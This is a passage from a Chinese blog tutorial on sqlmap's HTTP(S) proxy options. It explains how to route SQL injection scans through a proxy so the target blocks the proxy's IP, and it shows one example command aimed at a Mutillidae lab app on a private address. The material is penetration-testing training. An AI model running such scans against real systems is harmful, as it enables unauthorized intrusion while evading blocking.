<h2 id="http-s-代理"><a href="#http-s-代理" class="headerlink" title="http(s)代理"></a>http(s)代理</h2><p>比如要做一次扫描可能就会被目标服务器屏蔽掉所以用代理他屏蔽的就是代理的ip，应为你扫描的时候会发很多的探测包<br>参数<code>--proxy=&quot;http://代理的ip:代理的端口&quot;</code><br>如果代理有帐号密码可以用这个参数<code>--proxy-cred=&quot;帐号:密码&quot;</code><br>命令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u &quot;http://192.168.51.26/mutillidae/index.php?page=user-info.php&amp;username=1&amp;password=1&amp;user-info-php-submit-button=View+Account+Details&quot;--proxy=&quot;http://127.0.0.1:8080&quot;</span><br></pre></td></tr></table></figure>





































</article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">John Doe</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="http://example.com/2019/11/08/2%20%20sqlmap%E5%B7%A5%E5%85%B7%E8%AF%A6%E7%BB%86%E4%BD%BF%E7%94%A8%20SQLMAP%E8%87%AA%E5%8A%A8%E6%B3%A8%E5%85%A5%E5%A4%B4%E9%83%A8%E7%9A%84%E4%BF%AE%E6%94%B9/">http://example.com/2019/11/08/2%20%20sqlmap%E5%B7%A5%E5%85%B7%E8%AF%A6%E7%BB%86%E4%BD%BF%E7%94%A8%20SQLMAP%E8%87%AA%E5%8A%A8%E6%B3%A8%E5%85%A5%E5%A4%B4%E9%83%A8%E7%9A%84%E4%BF%AE%E6%94%B9/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="http://example.com" target="_blank">Hexo</a>！</span></div></div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/%E6%B8%97%E9%80%8F%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/">渗透工具使用</a></div><div class="post_share"><div class="social-share" data-image="https://gitee.com/wZass/zp/raw/master/img/20200913080330.png" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js/dist/css/share.min.css" media="print" onload="this.media='all'"><script src="https://cdn.jsdelivr.net/npm/social-share.js/dist/js/social-share.min.js" defer></script></div></div><nav class="pagination-post" id="pagination"><div class="prev-post pull-left"><a href="/2019/11/19/3%20sqlma%E5%B7%A5%E5%85%B7%E8%AF%A6%E7%BB%86%E4%BD%BF%E7%94%A8%20%20%20%E4%BB%BB%E5%8A%A1095pSQLMAP%E8%87%AA%E5%8A%A8%E6%B3%A8%E5%85%A5%E6%89%AB%E6%8F%8F%E6%97%B6%E9%97%B4%E5%92%8C%E4%BC%98%E5%8C%96/"><img class="prev-cover" src="https://gitee.com/wZass/zp/raw/master/img/20200913080330.png" onerror="onerror=null;src='/img/404.jpg'" alt="cover of previous post"><div class="pagination-info"><div class="label">上一篇</div><div class="prev_info">3 sqlmap工具详细使用   任务095：SQLMAP自动注入扫描时间和优化</div></div></a></div><div class="next-post pull-right"><a href="/2019/11/08/1%20sqlmapSQLMAP-%E8%87%AA%E5%8A%A8%E6%B3%A8%E5%85%A5/"><img class="next-cover" src="https://gitee.com/wZass/zp/raw/master/img/20200913080330.png" onerror="onerror=null;src='/img/404.jpg'" alt="cover of next post"><div class="pagination-info"><div class="label">下一篇</div><div class="next_info">1 sqlmap工具详细使用 任务093：SQLMAP- 自动注入</div></div></a></div></nav><div class="relatedPosts"><div class="headline"><i class="fas fa-thumbs-up fa-fw"></i><span> 相关推荐</span></div><div class="relatedPosts-list"><div><a href="/2019/11/08/1 sqlmapSQLMAP-自动注入/" title="1 sqlmap工具详细使用 任务093：SQLMAP- 自动注入"><img class="cover" src="https://gitee.com/wZass/zp/raw/master/img/20200913080330.png" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2019-11-08</div><div class="title">1 sqlmap工具详细使用 任务093：SQLMAP- 自动注入</div></div></a></div><div><a href="/2020/08/09/1.Metasploit介绍和模块/" title="1.Metasploit介绍和模块"><img class="cover" src="https://pic.3gbizhi.com/2019/0927/thumb_1680_0_20190927040015427.png" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2020-08-09</div><div class="title">1.Metasploit介绍和模块</div></div></a></div><div><a href="/2020/08/09/2. 再学Mestasploit基本使用/" title="2. Mestasploit 基本使用"><img class="cover" src="https://pic.3gbizhi.com/2020/0821/thumb_1680_0_20200821113456781.jpg" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2020-08-09</div><div class="title">2. Mestasploit 基本使用</div></div></a></div><div><a href="/2019/11/19/3 sqlma工具详细使用   任务095pSQLMAP自动注入扫描时间和优化/" title="3 sqlmap工具详细使用   任务095：SQLMAP自动注入扫描时间和优化"><img class="cover" src="https://gitee.com/wZass/zp/raw/master/img/20200913080330.png" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2019-11-19</div><div class="title">3 sqlmap工具详细使用   任务095：SQLMAP自动注入扫描时间和优化</div></div></a></div><div><a href="/2020/08/09/3.Metasploit使用/" title="3.Metasploit使用"><img class="cover" src="https://pic.3gbizhi.com/2019/1220/thumb_1680_0_20191220122945429.jpg" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2020-08-09</div><div class="title">3.Metasploit使用</div></div></a></div><div><a href="/2020/08/30/3nmapNSE脚本格式和编写/" title="3，nmap，NSE脚本格式和编写"><img class="cover" src="http://www.devapp.it/wordpress/wp-content/uploads/2015/11/nmap-logo.jpg" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2020-08-30</div><div class="title">3，nmap，NSE脚本格式和编写</div></div></a></div></div></div></div><div class="aside-content" id="aside-content"><div class="sticky_layout"><div class="card-widget" id="card-toc"><div class="item-headline"><i class="fas fa-stream"></i><span>目录</span></div><div class="toc-content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%AF%B7%E6%B1%82%E7%B1%BB%E5%9E%8B%E7%9A%84%E5%8F%82%E6%95%B0%EF%BC%9A"><span class="toc-number">1.</span> <span class="toc-text">请求类型的参数：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%8B%E9%9D%A2%E6%98%AF%E5%8F%82%E6%95%B0%E7%9A%84%E6%BC%94%E7%A4%BA%E4%BF%AE%E6%94%B9%E5%A4%B4"><span class="toc-number">2.</span> <span class="toc-text">下面是参数的演示修改头</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%82%E6%95%B0-%E2%80%93data"><span class="toc-number">3.</span> <span class="toc-text">参数  –data</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#get%E6%BC%94%E7%A4%BA"><span class="toc-number">4.</span> <span class="toc-text">get演示</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#POST%E6%BC%94%E7%A4%BA"><span class="toc-number">5.</span> <span class="toc-text">POST演示</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%98%E9%87%8F%E5%88%86%E9%9A%94%E7%AC%A6-%E2%80%93param-del"><span class="toc-number">6.</span> <span class="toc-text">变量分隔符 –param-del</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#cookie-%E5%A4%B4"><span class="toc-number">7.</span> <span class="toc-text">cookie 头</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#cookie-%E5%A4%B4-%E2%80%93cookie"><span class="toc-number">7.1.</span> <span class="toc-text">cookie 头 –cookie</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%84%B6%E5%90%8E%E6%89%AB%E6%8F%8F%E5%88%B0%E5%85%B6%E4%BB%96%E7%BD%91%E9%A1%B5%E6%9B%B4%E6%8D%A2%E4%BA%86cookie%E5%B7%A5%E5%85%B7sqlmap%E4%BC%9A%E8%87%AA%E5%8A%A8%E8%BF%9B%E8%A1%8C%E6%9B%B4%E6%8D%A2cookie%E7%9A%84"><span class="toc-number">7.2.</span> <span class="toc-text">然后扫描到其他网页更换了cookie工具sqlmap会自动进行更换cookie的</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#sqlmap-%E4%BC%9A%E8%87%AA%E5%8A%A8%E6%A3%80%E6%9F%A5cookie%E4%B8%AD%E7%9A%84%E6%B3%A8%E5%85%A5%E7%82%B9-level-gt-%E8%87%B3%E5%B0%91%E6%98%AF2"><span class="toc-number">7.3.</span> <span class="toc-text">sqlmap 会自动检查cookie中的注入点(level&gt;&#x3D;至少是2)</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%82%E6%95%B0%E2%80%93user-agent%E5%8F%AF%E4%BB%A5%E4%BF%AE%E6%94%B9-user-agent"><span class="toc-number">8.</span> <span class="toc-text">参数–user-agent可以修改 user-agent</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%94%A8%E2%80%93random-agent%E9%9A%8F%E6%9C%BAuser-agent"><span class="toc-number">8.1.</span> <span class="toc-text">用–random-agent随机user-agent</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%87%AA%E5%B7%B1%E6%8C%87%E5%AE%9Auser-agent"><span class="toc-number">8.2.</span> <span class="toc-text">自己指定user-agent</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#host%E5%A4%B4"><span class="toc-number">9.</span> <span class="toc-text">host头</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Referer%E5%A4%B4"><span class="toc-number">10.</span> <span class="toc-text">Referer头</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BF%AE%E6%94%B9referer%E5%90%8E%E9%9D%A2%E5%8A%A0%E4%B8%8A%E5%8F%82%E6%95%B0-referer-quot-%E8%A6%81%E6%8C%87%E5%AE%9A%E7%9A%84referer-quot"><span class="toc-number">10.1.</span> <span class="toc-text">修改referer后面加上参数--referer&#x3D;&quot;要指定的referer&quot;</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%A6%81%E6%A3%80referer%E6%98%AF%E5%90%A6%E5%AD%98%E5%9C%A8sql%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E2%80%93level-gt-3%E6%89%8D%E5%8F%AF%E4%BB%A5"><span class="toc-number">10.2.</span> <span class="toc-text">要检referer是否存在sql注入漏洞–level&gt;&#x3D;3才可以</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%A6%E5%A4%96%E5%A6%82%E6%9E%9C%E6%B2%A1%E6%9C%89%E8%BF%99%E8%BF%99%E4%B8%AA%E4%BF%AE%E6%94%B9%E5%8F%82%E6%95%B0%E7%9A%84%E5%A4%B4%E5%8F%AF%E4%BB%A5%E7%94%A8-%E2%80%93headers%E5%8F%82%E6%95%B0%E4%B8%8B%E9%9D%A2%E6%98%AF%E4%BB%96%E7%9A%84%E4%BD%BF%E7%94%A8"><span class="toc-number">11.</span> <span class="toc-text">另外如果没有这这个修改参数的头可以用 –headers参数下面是他的使用</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8D%95%E4%B8%AA%E8%A6%81%E4%BF%AE%E6%94%B9%E7%9A%84%E5%A4%B4%E5%8F%82%E6%95%B0-headers-quot-%E5%A4%B4%E5%90%8D-quot-%E8%A6%81%E4%BF%AE%E6%94%B9%E7%9A%84%E4%B8%9C%E8%A5%BF-quot-quot-%E8%BF%99%E4%B8%AA%E5%B0%B1%E4%B8%8D%E6%BC%94%E7%A4%BA%E4%BA%86"><span class="toc-number">11.1.</span> <span class="toc-text">单个要修改的头参数--headers&#x3D;&quot;头名:&quot;要修改的东西&quot;&quot;这个就不演示了</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%A6%81%E6%98%AF%E5%A4%9A%E4%B8%AA%E5%BF%85%E9%A1%BB%E6%8D%A2%E8%A1%8C-n%E5%8F%82%E6%95%B0-headers-quot-%E5%A4%B4%E5%90%8D-quot-%E8%A6%81%E4%BF%AE%E6%94%B9%E7%9A%84%E4%B8%9C%E8%A5%BF-n-quot-%E5%A4%B4%E5%90%8D-quot-%E8%A6%81%E4%BF%AE%E6%94%B9%E7%9A%84%E4%B8%9C%E8%A5%BF-quot"><span class="toc-number">11.2.</span> <span class="toc-text">要是多个必须换行\n参数--headers&#x3D;&quot;头名:&quot;要修改的东西\n&quot;头名:&quot;要修改的东西&quot;</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%89%AB%E6%8F%8F%E6%8C%87%E5%AE%9A%E5%8F%91%E7%9A%84%E5%8C%85GET%E5%92%8CPOST"><span class="toc-number">12.</span> <span class="toc-text">扫描指定发的包GET和POST</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9F%BA%E4%BA%8EHTTP%E5%8D%8F%E8%AE%AE%E7%9A%84%E8%BA%AB%E4%BB%BD%E9%AA%8C%E8%AF%81"><span class="toc-number">13.</span> <span class="toc-text">基于HTTP协议的身份验证</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%9D%9E%E5%B8%B8%E5%B0%91%E8%A7%81%E7%9A%84%E5%B1%85%E4%BA%8E%E5%AE%A2%E6%88%B7%E7%AB%AF%E8%AF%81%E4%B9%A6%E6%9D%A5%E8%BF%9B%E8%A1%8C%E8%BA%AB%E4%BB%BD%E8%AE%A4%E8%AF%81%E7%9A%84"><span class="toc-number">14.</span> <span class="toc-text">非常少见的居于客户端证书来进行身份认证的</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#http-s-%E4%BB%A3%E7%90%86"><span class="toc-number">15.</span> <span class="toc-text">http(s)代理</span></a></li></ol></div></div></div></div></main><footer id="footer"><div id="footer-wrap"><div class="copyright">&copy;2020 - 2021 By John Doe</div><div class="framework-info"><span>框架 </span><a target="_blank" rel="noopener" href="https://hexo.io">Hexo</a><span class="footer-separator">|</span><span>主题 </span><a target="_blank" rel="noopener" href="https://github.com/jerryc127/hexo-theme-butterfly">Butterfly</a></div></div></footer></div><div id="rightside"><div id="rightside-config-hide"><button id="readmode" type="button" title="阅读模式"><i class="fas fa-book-open"></i></button><button id="font-plus" type="button" title="放大字体"><i class="fas fa-plus"></i></button><button id="font-minus" type="button" title="缩小字体"><i class="fas fa-minus"></i></button><button id="darkmode" type="button" title="浅色和深色模式转换"><i class="fas fa-adjust"></i></button><button id="hide-aside-btn" type="button" title="单栏和双栏切换"><i class="fas fa-arrows-alt-h"></i></button></div><div id="rightside-config-show"><button id="rightside_config" type="button" title="设置"><i class="fas fa-cog fa-spin"></i></button><button class="close" id="mobile-toc-button" type="button" title="目录"><i class="fas fa-list-ul"></i></button><button id="go-up" type="button" title="回到顶部"><i class="fas fa-arrow-up"></i></button></div></div><div><script src="/js/utils.js"></script><script src="/js/main.js"></script><div class="js-pjax"></div><script async data-pjax src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></div></body></html>